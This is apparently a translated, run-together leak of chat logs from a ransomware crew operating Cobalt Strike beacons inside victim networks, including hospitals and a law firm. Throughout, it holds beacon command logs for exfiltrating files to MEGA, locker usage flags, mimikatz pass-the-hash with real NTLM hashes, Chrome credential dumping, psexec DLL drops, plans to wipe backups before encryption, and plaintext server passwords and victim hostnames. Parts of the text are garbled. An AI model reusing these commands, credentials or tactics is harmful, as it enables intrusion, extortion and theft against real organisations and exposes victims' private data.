the localhost. Can it pick up files from other hosts on the network? If so, what is the right command? 
tried it: ``` beacon> shell MEGAclient.exe put -q --ignore-quota-warn \192.168.33.20\E$\Data1\for Vincent\Data\2020Workpapers.7z / [*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn \\192.168.33.20\E$\Data1\for Vincent\Data\2020Workpapers.7z / [+] host called home, sent: 146 bytes [+] received output: [API:err: 14:16:36] Unable to open local path: \\?\\\192.168.33.20\E$\Data1\for [API:err: 14:16:36] Unable to open local path: \\?\C:\Users\administrator.COVALAR\AppData\Local\MEGAcmd\Vincent\Data\2020Workpapers.7z ``` swearing on the address token is in the file browser shows everything ...Men, who has a cobalt free server with padding, need help, help out :)and there is a difference between the actual maunts with a token and the creeds directly? `` Mounting a network drive: net use x: \\%computer_name%\c$ /user:%domain%\user% %password% Dismounting a network drive: net use x: /delete /Yes Instead of X there is a letter ``````/user:domain/admin password if you want to run it from token[ ](https://stylebrooks.com/group/discussion?msg=TLnL2i7vXYgPTDxDK) I think you should run it from SYSTEM and not from OK, if you want to run it from a letter in the domain you would probably enter 20 disks and if you just turn on 1 locker it will work in 1 thread but if you nomex each disk then that's 20 threads you know what I mean? -single threads on every drive with non-mutex then you have to lock it or by the way the above implies that you have rights I think it's better to lock the machine this is your way out I think` `` lock.exe -nomutex -p \\host\path ``````Startup parameters: -m[all/net/local] all - encrypt all (Default) net - encrypt only network resources local - encrypt local files only example usage: lock.exe -m all or lock.exe lock.exe -m local lock.exe -m net launch example: lock.exe -h C:\hosts.txt -nomutex Disables mutex protection against double starting. 
-size[10/15/20/25/30/35/40/45/50/60/70/80] This parameter defines how much % of the file will be encrypted (by default 50%), the file is encrypted in different places in chunks. At the same time databases are 100% encrypted and VM files are 20% encrypted regardless of the value of the parameter. example: lock.exe -size 35 -p[path] If this parameter is used, the locker will encrypt files in the specified path It is forbidden to start the locker in normal mode until the specified path is processed. example: lock.exe -nomutex -p C:\path lock.exe -nomutex -p C:\path2 lock.exe -nomutex -p \\\host\path -log [path to log file] Enables error logging Example usage: lock.exe -log C:\log.txt All parameters can be combined with each other, the order is not important. If the locker is run through the command line, then run it from the admin (If you have rights). ``but without the maunta there's a separate command for remoting the path if you run the EXE locker, you will run the production dd auxiliary services last in queue or prioritize each normal yes. 10 hypers like that at the very least. 10 servers? one virtual machine is enough) at 10 pm start a virtual machine is fine but I would insure vpnom - 3 virtuals with a channel 1000mbps clamp just in case in the local speed gigabit two or three will + in the local + in the local + not in power to the hard will be limited to imholoker not really eats a couple of cores give a notice - in the notification settings, maybe see if there is anything to send What do not delicate? You should create a virtual on the server next to these virtuals and from one server to hammer on the harddamThat could theoretically be within the LAN speed should be normal zajoinit in the domainvirtualku create them there if you have physical servers can still on the ideaoptmally take in UC dedic, there hang a virtual and so lokalit. 
If you have a 100gb file, calculate how long it will take to locate it, like 10mbit/s+test the speed - sometimes on vpn slow speed stop sevries that take files``. Is there any tricky way to connect disks from the excie server and localize?) ``` only if there is a smb balloon on the nix machine where these disks are located ``` tried different ones - they either write old or need a new one ``` only by testing ``` are there any sharpe formgrabber solutions for coba? ``` no formgrabber on sharpe, it's browser hooks, very dirty method and keylogger+styler, formgrabber is essentially meaningless with keylogger/stylera are there any solutions to formgrabber on sharpe for coba? does anyone know a way to determine the version of timeweaver on the remote machine? i tried different ones, they say either old or new. is there any tricky way to connect disks from the ecy server and localize? i can't crash the process from systema i already figured it out)and in it run the dll as usuala it's not like that, run the first line, there will be a cmd from systema web log address visible: ```` 12/12 12:46:57 visit (port 443) from: 204.***.181.*** Request: GET /Menus.aspx beacon beacon stager x64 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) ```` but the session does not appear not already crashed, but the session is not there, I'll do something else. What can it be, dll is working, I just threw it on the other machine 15 minutes ago```` The module "ap1.dll" was loaded but the entry-point DllRegisterServer was not found. Make sure that "ap1.dll" is a valid DLL or OCX file and then try again. ````okay, thanks, I'll check it, and the rights are, why LPEvon utility runhttp://www.sordum.org/9416/powerrun-v1-4-run-with-highest-privileges/надо some kind of lpeadaalf by rdp? and how to make it quickly? test it from the systemnea just from admin? have you tried from the system? it would be nice to rebuild of course maybe it's a good idea to rebuild it? 
i don't know if it's working or not? i don't know if it's the right command or not and i can't get it to work through regsrv or rundll i just need to add memory protection session to cobu. maybe aver has such sliders or i just need to turn on the pollack context if i need pollack context then i need to put akoninject to kill aver and i think there is something elseVirge How can I get bypass on the bypass whitelist? Can someone tell me how to start a dll on the host, rundll32 and regsrv32 crash and won't let me inject it into the process? How to bypass this kind of thing is possible? and will live jump into the win init help a fellow TOR fix please what are you fixing? men, if anyone free to help a little with the fix in the network There is YES; network without AV, only backup stand But all the time the session dies, a little help would be) hash on the brute force in pmspasibasiba)` python office2john.py dummy.docx > hash.txt ` not to dig ...ok - thanks digging either him, yes ...jonh the ripper software has further either hash itself brute force or in the servicedraw the password hash and give to brute force:thumbsup:thanks! hai, https://rixler.password-find.com/ try and download the dock and click reset pass, in free form, the first 3 lines of excel will decrypt the idea, the dock is something else. It helped a lot with password protectedHi all, I have a question, I have a password protected dock. All that was similar to the passwords I have already tried and passed. Is there a point to cracking a locked dock? Is it worth the trouble? And if anyone's opened it, push me in the right direction. Thank you! 
I can't even imagine how they can put one into the other, too massive frameworks, one in Ruby, the other in java ``` as far as i understood the first versions of cobalt worked like that when it replaced armitage it was sort of linked to msf i don't know why it disappeared later i can't even imagine how they put one into the other, they're too massive frameworks, one on ruby and the other on java i'd say it was a skin for armitage lolvodethe old versions had it or it was self written) but how did they put coba's skin?[ ](https://stylebrooks.com/group/discussion?msg=GBqqftAWnGR9bY9qf) 1)portscan 2)ladon portscenespartners, salaam, has anyone done this? maybe you know modules like this? you have a task he will tell me what to do i told himflint you with a brad+speak up guys who's free for a data dump guys it's a winDoc on the public''. USA Windows dedicated CPU: Intel Xeon E3-1280v2 RAM: 16GB HDD: 4TB SATA --- 199.241.189.38 u: Administrator p: ei*xi67Bfhw8a$f%RasdxcASnsd!@ ``` if you leave a session on the dll, it won't crash if you don't have a way to do it by the way it's accepted. if you leave it on the dll - it crashes after a few hours while these are observations) I checked on a couple of servers - there was no reboot, but the session fellaprobesthe next time, as you restore the session, look how long the computer is running, something like this: ` `(Get-Date (Get-Process explorer).StartTime).ToString('yyyyyMMdd')[ ](http://wfy76wigkpoxqbe6.onion/group/cobalt_v42_patched?msg=xu2Q4qYAAed7PbQ7S) As I understand it separately in some networks, apparently something at the hardware level, I had 2 times, on several machines in 2 networks ... but perhaps, as noted - was restarting servers, I did not watch the life of a computer[ ](https://stylebrooks.com/group/cobalt_v42_patched?msg=3Fe4AGJ8mLf4nfGnm) was like this, when the big slip put for 10 minutes from hibernation mode returns. 
on vorkstantsyayut meet, servaki usually resetatumiret, she is in memory but the technologist asks about anotherRead after restart your session should die?) as a follow-up question - how to remove the jitter 300 seconds? fuckin' randomly lead sessions to the slip - after 3-4 hours the session crashes Anybody else has to deal with massive crash sessions at night for no reason?ICt only that here@barabulkaVanoprince@alter @prince add yuzalgeoblok quite probable or not enabled windef or geoblok@all help please who faced this problem, my partner on another server logs in, I have the same creed - the error if you have not set PATH then just go to C:\users\administrator\ubuntu\ and run ubuntu.exe that's it, you are in the terminal, you can do sudo apt update =)guys, very useful thing, in fact you have two axes on one dedicap, handy for work under the vpn terminal linux in winds, need 2019 server ``` === we need windows server 2019+ 1. run poower shell as administrator and type: > Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux 2. Download linux subsystem distro from: https://docs.microsoft.com/en-us/windows/wsl/install-manual like: kali: https://aka.ms/wsl-kali-linux-new ubuntu18.04: https://aka.ms/wsl-ubuntu-1804 ubuntu20.04: https://aka.ms/wslubuntu2004 debian: https://aka.ms/wsl-debian-gnulinux Open poowershell and extract files from appx like:(Ubuntu -> changed_name) copy .appx downloaded file to C:\Users\Administrator and go to the this folder in pwsh > Rename-Item .\Ubuntu.appx .\Ubuntu.zip > Expand-Archive .\Ubuntu.zip .\Ubuntu > cd kali 4. Run Ubuntu.exe 5. 
Add your distro path to the Windows environment PATH (C:\Users\Administrator\Ubuntu in this example), using PowerShell: $userenv = [System.Environment]::GetEnvironmentVariable("Path", "User") [System.Environment]::SetEnvironmentVariable("PATH", $userenv + ";C:\Users\Administrator\Ubuntu", "User") !1/ if you dont have exe in your folder, check these steps with another distro !2/ Installation failed with error 0x8007007e: If you receive this error, then your system doesn't support WSL. Ensure that you're running Windows build 16215 or later. Check your build. Also check to confirm that WSL is enabled and your computer was restarted after the feature was enabled. ``````execute-assembly /home/user/soft/scripts/SharpChrome.exe logins /showall ``---Alternative from under the coba : ```mimikatz dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect ``Hi. who used SharpChrome, could you please share the manual? and all the data there and add me there create a new channel there how to transfer@alex transfer to a new rocket?i already tried a million variations and still nothing lezzhodithey by web domain some removed home bluepathfinance with domain goodvibsi they removed the form "5baftI06a0yitk0SBmQh4T1mip01shZTHVdUPyxDYN0= 1 jkinnen Fordo55! goodvibes "even though they're exactly right because they took off the same ones the second one will write incorrectlyesonix neither through extender nor through web doesn't want to accept passwordsneeded opinionchekaju@alex zaletayos spsraz tvinovskaya diedbinari on cobu eira have? hi+1+ )@steven, bro sit without delav processem? What command can I export cookies in JSON format through execute-assembly? on sharpchrome or something similar@all who has sharpPrintNightmare RCE started? 
``` 3MCDIDAT.main.crispregional.org Allscripts_PM.main.crispregional.org ATComm.main.crispregional.org Bepoz.main.crispregional.org Cintas.main.crispregional.org CorepointApp01.main.crispregional.org CorepointApp02.main.crispregional.org CorepointTest.main.crispregional.org CRHS-Dragon.main.crispregional.org CRHS-PRINT.main.crispregional.org crhs-security.main.crispregional.org CRHSBACKUP.main.crispregional.org CRHSvCenter.main.crispregional.org CRHSViewCon02.main.crispregional.org CRHSViewExtCon.main.crispregional.org CRHSViewTS4.main.crispregional.org CRHSViewTS5.main.crispregional.org CRHSViewTS6.main.crispregional.org CRRHPUMP1.main.crispregional.org CRRHPUMP2.main.crispregional.org CRRHPUMP3.main.crispregional.org HISCODER.main.crispregional.org HPDeviceManager.main.crispregional.org HRBADGE.main.crispregional.org Intranet.main.crispregional.org Intranet.main.crispregional.org IT-ADMIN.main.crispregional.org IT-Info.main.crispregional.org Syslog.main.crispregional.org Lansweeper.main.crispregional.org MedManager.main.crispregional.org MedNet.main.crispregional.org NEXO.main.crispregional.org NovaNet.main.crispregional.org ProvationApp.main.crispregional.org ProvationDB.main.crispregional.org PYXIS-APP.main.crispregional.org PYXIS-CCE-PROD.main.crispregional.org PYXIS-DB.main.crispregional.org PYXIS-RPT.main.crispregional.org PyxisPharmLive.main.crispregional.org QMS.main.crispregional.org ScriptSvr01.main.crispregional.org SPFoundation.main.crispregional.org TELCOR.main.crispregional.org Trinisys-APP.main.crispregional.org Trinisys-DB.main.crispregional.org ``Let's take our time to prepare and close down little by little, how much is that? Well, shall we start little by little? 
https://www.lets-talk-about.tech/2018/03/rubrik-reset-brik-to-factory-default.htmlпроверяем) it's a little early[ ](https://mediaeveryone.com/group/1-done-crispregional-org?msg=bYvaQAP93d3DLXhm6) 206.221.188.106:38824then close down little by little, the servers are still being restored via rubrik I propose to reset the passwords on the cx, erase rubric and encrypt all over again They restore everything from it, and the storage of backups there too but there's a problem in the form of `` anti_ransom.exe ``` - put on some servers. seems to bite, cuts the launch dll. the idea is to go around the rdp and remove or disconnect the rest of the televisa last session fell off today - tv, yesterday's nets from the vpn and the current @user3[ ](https://mediaeveryone.com/channel/general?msg=gCK9C9WQDpE52k8pR) Well, just ate lunch rolls.the question was where are we wasting our time in general, I'm not talking about this network in a network where 21k npc are the quietest waysshaprhoud\accesses to shampeople\shaprhoud\accesses to shampeople\gather comps and servers where to bruteforce on lato tell me differentlywhat other info are you spending time while hell is gathering?) did not have time (rubeus I always run after collecting information + where are the hashes? manually gather would be quieterwhy tulchaindomainDKnu always started with this (YES LA EA adinfo) the question is why the fuck do I know that this from tulchainaand I know what or how it is connected, but after the adfind finished files and the archive began downloading the session died Why use it? 
```
[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output: 333301283
[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output: 398533948
[*] Tasked beacon to run .NET program: check.exe adflogs
[+] host called home, sent: 110661 bytes
[+] received output: 437262015
```
Why is it definitely dead now (- from mathem.local there are still live sessions? It's too big, if you work with it don't fuck it up.
```
Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
bbt0097                  reconwindomp             suQARSp_admin
suWATprod
The command completed successfully.
```
I spammed a new one, try it yourself, there is only 1 session at all, do any command and it dies. Spamming session banally, ask YES and the session dies. Everything is bad, just terrible, does not give anything to do. All who have problems go to this coboo and work from there
`flexzap.com` `192.254.78.106:30504` `sUSsQS7WpevaVL12GSMXs8Z10cXXski8ins`
cannot use eleveits @tl1 In the new coba from the user does not give anything to do
```
[-] could not spawn C:\WINDOWS\sysnative\wusa.exe: 740
[-] Could not connect to pipe: 2
```
hi :space_invader: Hi Hi Hi Hi Hi, there was one this morning. Anyone still have the files? You need to know how to do this, it's the only method to dump chrome without a session on the machine. We dumped the masterkey, and it's not coming, so we're trying to dump the masterkey with the file. It's not like it's a backup, huh? I wonder what clupload has to do with it... Whatever, so do it. And offline solved the problem. I threw how to pull chrome through DPAPI. Found a polzak masterkey that goes to malwarenu to decrypt the DPAPI content chrome in sharp chrome. Master-key can somehow work?
maybe from it a folder OutLook, I don't know, it doesn't say anything... and sitbell search for credentials came up login credentials.jpg
```
C:\Users\johni\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\58CKFMPE
```
What is this and where does it come from? Search for cloud storage access further in the browsers, which software accesses these clouds, and then find out what it is and understand what it is, NAS/network hardware or what. See what admin is hanging out there and blow on the 80/443 ports to figure out what's up with the host. Already I'm thinking how the hell it was!!!!!!!!! It's on d
```
ls \\hostname\d$
```
gives an output or what? I do not know how to comment on the attempt to copy to an inaccessible dir. What to do in this case is obvious in my opinion, sorry. It's all open ports, 3389 can be checked in hell, you can check what axis is still open? If the drive C does not exist - there can only be one fucking obvious assumption) It's not even an error to correct you, somewhere you try to copy the file to a non-existent dir. I do not know what to add, you are so verbose ...
```
(ICMP) Target '192.168.100.97' is alive. [read 8 bytes]
[+] received output:
192.168.100.97:443
[+] received output:
192.168.100.97:80
192.168.100.97:22 (SSH-2.0-dropbear_2014.63)
```
Scan to everything.
```
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 01:00:27> shell dir \\desktop-33jh80d.sprouselaw.com\c$
[*] Tasked beacon to run: dir \\desktop-33jh80d.sprouselaw.com\c$
[+] host called home, sent: 70 bytes
[+] received output:
The network path was not found.
```
22
shell dir \\desktop-33jh80d.sprouselaw.com\c$ already tried
445
which ports can be scanned?
```
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:58:27> shell net view \\desktop-33jh80d.sprouselaw.com
[*] Tasked beacon to run: net view \\desktop-33jh80d.sprouselaw.com
[+] host called home, sent: 72 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.
```
same kind of ballyhoo then so yeah.
```
Name:    desktop-33jh80d.sprouselaw.com
Address: 192.168.100.97
```
that's his host, the one you threw in is DK \\zion.sprouselaw.com
but try the hostname
```
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:49:54> shell net view \\192.168.100.97
[*] Tasked beacon to run: net view \\192.168.100.97
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:53:59> shell ping 192.168.100.97 -n 1
[*] Tasked beacon to run: ping 192.168.100.97 -n 1
[+] host called home, sent: 55 bytes
[+] received output:
Pinging 192.168.100.97 with 32 bytes of data:
Reply from 192.168.100.97: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.100.97:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:54:48> shell nslookup 192.168.100.97
[*] Tasked beacon to run: nslookup 192.168.100.97
[+] host called home, sent: 54 bytes
[+] received output:
Server:  zion.sprouselaw.com
Address:  192.168.100.240

Name:    desktop-33jh80d.sprouselaw.com
Address:  192.168.100.97
```
I don't know what to do, there is no view on the host/ip. Well, scan the win ports. How can you check this? I'm not sure of anything in life. So how do you copy to a folder you can't see? Are you sure it's a win machine?
@user8 from any machine as long as the machine sees all domain controllers
```
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:44:06> ls \\192.168.100.97\C$\
[*] Tasked beacon to list files in \\192.168.100.97\C$\
[+] host called home, sent: 37 bytes
[-] could not open \\192.168.100.97\C$\*: 53

usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:44:50> ls \\192.168.100.97\C$\ProgramData
[*] Tasked beacon to list files in \\192.168.100.97\C$\ProgramData
[+] host called home, sent: 49 bytes
[-] could not open \\192.168.100.97\C$\ProgramData\*: 53
```
Sure it works on any machine or is it better with the DK? Is the folder accessible? And with ls \\192.168.100.97\C$\ProgramData @tl2
```
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:41:13> shell copy C:\ProgramData\updates.dll \\192.168.100.97\C$\ProgramData\
[*] Tasked beacon to run: copy C:\ProgramData\updates.dll \\192.168.100.97\$\ProgramData\
[+] host called home, sent: 95 bytes
[+] received output:
The network path was not found.
        0 file(s) copied.
```
@user7 for what reason? What failed?
192.168.100.238 + I connected and it just froze, then I couldn't get the dll on it
192.168.100.97 - 192.168.100.98 - 192.168.100.99 - 192.168.100.94 - 192.168.100.95 - couldn't get on these machines
http://habr.com/ru/post/434514/
How to use VPN
1. Double-click the VPN icon on the Desktop
Skip (2. Double-click 38.68.2.51)
3. Enter username JeffH (case sensitive)
4. Enter password Sprouse20!
5. Click OK
---------------
6. When finished, right-click 38.68.2.51 > click Disable
7. Close the VPN window.
on DA computer installed PasswordsPlus
@user9 well if you can see the login there - it makes sense to try any other creds with the login of this polzak
+ Does it start without comma?
```
remote-exec psexec 192.168.100.103 rundll32 C:\ProgramData\1580759637.bdinstall.dll entryPoint
shell copy 1580759637.bdinstall.dll \\192.168.100.103\C$\ProgramData\
```
Look for notes from this username
@tl2 found a computer where the admin goes to https://cloud.malwarebytes.com/ but it won't unlock the chrome credentials. tried with dpapi:chrome and sharpchrome prints out empty passwords.
pay special attention to possible system backup
`matts-pc [192.168.100.93]`
```
beacon> pth SPROUSELAW.COM\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:aandaservice /domain:SPROUSELAW.COM /ntlm:1737a8ca4966a1b4cf767232b0a4bd58 /run:"%COMSPEC% /c echo 2e8d2fa8e2b > \\.\pipe\4fee59" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user    : aandaservice
domain  : SPROUSELAW.COM
program : C:\WINDOWS\system32\cmd.exe /c echo 2e8d2fa8e2b > \\.\pipe\4fee59
impers. : no
NTLM    : 1737a8ca4966a1b4cf767232b0a4bd58
  |  PID  11124
  |  TID  8532
  |  LSA Process is now R/W
  |  LUID 0 ; 1696015470 (00000000:6517246e)
  \_ msv1_0   - data copy @ 00000275420FFA80 : OK !
  \_ kerberos - data copy @ 000002754222D6C8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000002754218E768 (32) -> null

beacon> shell copy x64.dll \\192.168.100.227\C$\ProgramData\x64.dll
[*] Tasked beacon to run: copy x64.dll \\192.168.100.227\C$\ProgramData\x64.dll
[+] host called home, sent: 84 bytes
[+] received output:
The referenced account is currently locked out and may not be logged on to.
        0 file(s) copied.
```
`pth SPROUSELAW.COM\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58`
```
beacon> pth sprouselaw\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:aandaservice /domain:sprouselaw /ntlm:1737a8ca4966a1b4cf767232b0a4bd58 /run:"%COMSPEC% /c echo b7a7be09788 > \\.\pipe\cb0f70" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user    : aandaservice
domain  : sprouselaw
program : C:\WINDOWS\system32\cmd.exe /c echo b7a7be09788 > \\.\pipe\cb0f70
impers. : no
NTLM    : 1737a8ca4966a1b4cf767232b0a4bd58
  |  PID  9896
  |  TID  936
  |  LSA Process is now R/W
  |  LUID 0 ; 1695752222 (00000000:6513201e)
  \_ msv1_0   - data copy @ 0000027541E22080 : OK !
  \_ kerberos - data copy @ 0000027541F15C08
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000002754218FAE8 (32) -> null
```
```
user    : aandaservice
domain  : SPROUSELAW.COM
program : C:\windows\system32\cmd.exe /c echo a093d2314f1 > \\.\pipe\cf9cc0
impers. : no
NTLM    : 1737a8ca4966a1b4cf767232b0a4bd58
  |  PID  19196
  |  TID  15936
  |  LSA Process is now R/W
  |  LUID 0 ; 575605488 (00000000:224f0af0)
  \_ msv1_0   - data copy @ 000001FD13FD6080 : OK !
  \_ kerberos - data copy @ 000001FD13E24C88
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000001FD13F107E8 (32) -> null
```
`pth sprouselaw\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58`
```
The referenced account is currently locked out and may not be logged on to.
```
`pth sprouselaw\administrator 59ae5e3ea853a81e1dsfsdfsdfse0e3fafbb052qw68455-721-18c`
line 19 through 37 from 192.168.100.227 to 192.168.100.89
https://ru.malwarebytes.com/business/endpoint-protection/
192.168.112.157 192.168.112.158 ``cavona kmd5 both by5183 dustintp c2a23920677e464f359320c23947c237 5125235 aandaservice 1737a8ca496a1b4cf767232b0a4bd58 66048 friends who are out of work or sitting in dead-ends - throw your dlkudayLekha shalomUtra in hut, comrades!oday Vovao Semyon helloDayDay, what grids will work? user3 will try[ ](https://mediaeveryone.com/group/silencershop-com?msg=CoNfDvPLR9LxZZFG6) and by the way did not pass? user3 Add plz @user3 he'll take it from here. I'll try poking around in the code, maybe you have some? No, I can't find an alternative to SharpPrinter and no other implementations? Unhandled Exception: Unhandled Exception: System.ArgumentOutOfRangeException: Index was out of range. Must be non-negative and less than the size of the collection. Parameter name: startIndex at System.String.IndexOf(String value, Int32 startIndex, Int32 count, StringComparison comparisonType) at System.String.IndexOf(String value, Int32 startIndex) at SharpPrinter.Program.getSnmp(String host, String OID) at SharpPrinter.Program.SendArpRequest(IPAddress dst) at SharpPrinter.Program.<>c__DisplayClass6_0.b__0() at System.Threading.ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx) at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx) at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state) at System.Threading.ThreadHelper.ThreadStart() System.ArgumentOutOfRangeException: Index was out of range. Must be non-negative and less than the size of the collection. 
Parameter name: startIndex
   at System.String.IndexOf(String value, Int32 startIndex, Int32 count, StringComparison comparisonType)
   at System.String.IndexOf(String value, Int32 startIndex)
   at SharpPrinter.Program.getSnmp(String host, String OID)

There must be something in the code.
printers
to compile the exe, it doesn't work
citrix
no printers
citrix
description?
hell, what exactly?
gpp empty, hell?
What else can I try?
No progress so far:
no way to raise rights
17-010: empty
xp: all ports are closed, but it pings
ftp is empty
sql is not online
lockout is zero, ran a storm with the passwords found - nothing
no passwords in files and shares
no kerbs
there is no username anywhere - no password - no kerbs

```
192.168.1.2:445 (platform: 500 version: 10.0 name: SS-DATA2 domain: SilencerShop)
192.168.1.101:445
192.168.1.115:445 (platform: 500 version: 10.0 name: SS-HEATHER domain: SilencerShop)
192.168.1.120:445 (platform: 500 version: 10.0 name: SS-SALES2 domain: SilencerShop)
192.168.1.122:445 (platform: 500 version: 10.0 name: SS-BISCHOFFDESK domain: SilencerShop)
192.168.1.125:445 (platform: 500 version: 10.0 name: DESKTOP-2G463RJ domain: SilencerShop)
192.168.1.126:445 (platform: 500 version: 10.0 name: SS-SALES1 domain: SilencerShop)
192.168.1.133:445 (platform: 500 version: 10.0 name: SS-LMATHENY domain: SilencerShop)
192.168.1.135:445 (platform: 500 version: 10.0 name: NCC-1701 domain: SilencerShop)
[+] received output:
192.168.1.136:445 (platform: 500 version: 10.0 name: SS-SURFACEBOOK2 domain: SilencerShop)
192.168.1.137:445 (platform: 500 version: 10.0 name: SS-AWELLS domain: SilencerShop)
192.168.1.138:445 (platform: 500 version: 10.0 name: SS-BROOKS domain: SilencerShop)
192.168.1.141:445 (platform: 500 version: 10.0 name: SS-MDIONNEJR domain: SilencerShop)
192.168.1.142:445 (platform: 500 version: 10.0 name: DESKTOP-69NK6FB domain: SilencerShop)
192.168.1.144:445 (platform: 500 version: 10.0 name: DESKTOP-T1BM5VF domain: SilencerShop)
192.168.1.147:445 (platform: 500 version: 10.0 name: SS-KBRYMER domain: SilencerShop)
192.168.1.166:445 (platform: 500 version: 10.0 name: SS-KATE domain: SilencerShop)
192.168.1.168:445 (platform: 500 version: 10.0 name: SS-FPTSCAN domain: SilencerShop)
192.168.1.169:445 (platform: 500 version: 10.0 name: SS-MORTEGA domain: SilencerShop)
192.168.1.186:445 (platform: 500 version: 10.0 name: SS-ANDERS domain: SilencerShop)
192.168.1.207:445
192.168.1.214:445 (platform: 500 version: 10.0 name: SS-KCROSS domain: SilencerShop)
```

session crashed
win 10 2004 - failed to get up (not LA)
shuffliner is not LA anywhere else
whining is not online
ftp is there, but nothing worked
one xp, but all ports are closed
nothing online under 17-010
started scanning with sharpPrinter and it flew away
all the rest, what can
kerbs: no
and citrix, kerbs?
he is nowhere else
lav files also nothing but the password
polozak
not la, unlikely to get up
there is 1 xp, but all the ports are closed
all ok
rch lagging?)
hang them up; if you see that they recover - finish it = )
from here a couple of sessions came with fsrv and dk - the rdmi is
1.done.lrhc.org
0.done.lrhc.org
and on to #general
That's it, let's wrap it up.
enter + 1 additional net[ ](https://mediaeveryone.com/group/lrhc-org?msg=4vFvHrAH6kSgf5ekp) will not come out, no internet so far in difficilepo classics disassemble and workupon give you a cobu where will fly sessions we have a little time to talk about the process I'm not particularly happy servers: 5/7 (2 were not attracted) armas: servers flew away fast, no time to map Now for the process, let's keep this format for the future mcklrh.mig servers: 6/6 Armas: 15 masked, not yet encrypted ffmg.local servers: 1/3 (1 did not attract, 1 no kred, not allowed even YES) armas: not zamapi ELEAH.LOCAL servers: 5/7 (2 were not attracted) Armies: Servers flew away quickly, no time to map lrhc.local servers: 171/175 (4 not attracted or mapped, no disks/balls visible) armas: 791/1040 mapped, cipher in question ´´Well, there are approximate stats not yet? what? contact @ot us router is connecting to the wpn, what's the problem? reboot what? reboot what? @tl1? we have office proxy failed - we cobbed and ready, now we're completing the status, completing what? minutes1 left to get one and a half domains? so what? `ffmg.local\petekuttera e65e7043f9e8c2321284f39e830a51ba`FFMG\Administrator Lexapro421!oxa`mapped to LRHDC02 one and a half domains left to get the scale of the tragedyDescribe the intermediate result10.10.70.5 - mask disks c,d,e on the dk+on the dk, there are still not allowed to do soIs it possible to pull on a blocked server and run the inject on a new one will work? we have several scenarios or shut off AVproblem mapped to another server? 
doesn't break his dll and exe
check why the server isn't blocked

```
[+] received output:
Host Name:                 LRH-WDS01
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
```

```
Name                                  Version
Sophos Network Threat Protection      1.10.1051.0
Sophos Anti-Virus                     10.8.9.610
Sophos Endpoint Self Help             3.0.217.0
Sophos AutoUpdate XG                  6.6.144.0
Sophos Health                         2.4.7.0
AppRecovery Agent                     6.4.0.718
Sophos Endpoint Agent                 2.0.423.0
Sophos Diagnostic Utility             6.5.238.0
Sophos Endpoint Firewall              1.2.0.17 6.1.1.28093
Sophos File Integrity Monitoring      1.0.1.11
```

If not, if it's not hanging, then the crypt is going on.
Check the session pid, skip the ones that fell off while we're working on it.
I'll clarify: the file is the first to drop, and the crypt is in the next hour
if the file appears but the session is dead?

```
 Directory of \10.10.30.211$

06/21/2019  10:29 AM                 0 CLRtypes.txt
12/21/2020  02:55 AM    <DIR>          Downloads
12/21/2020  06:00 AM               278 ErrorLog.xml
12/21/2020  02:55 AM    <DIR>          inetpub
12/21/2020  02:55 AM               849 LABEL_rhollis.txt.PXILP
12/21/2020  02:55 AM    <DIR>          Logs
06/21/2019  10:22 AM                 0 msxml.txt
07/09/2017  10:03 AM    <DIR>          PerfLogs
12/21/2020  02:55 AM    <DIR>          Program Files
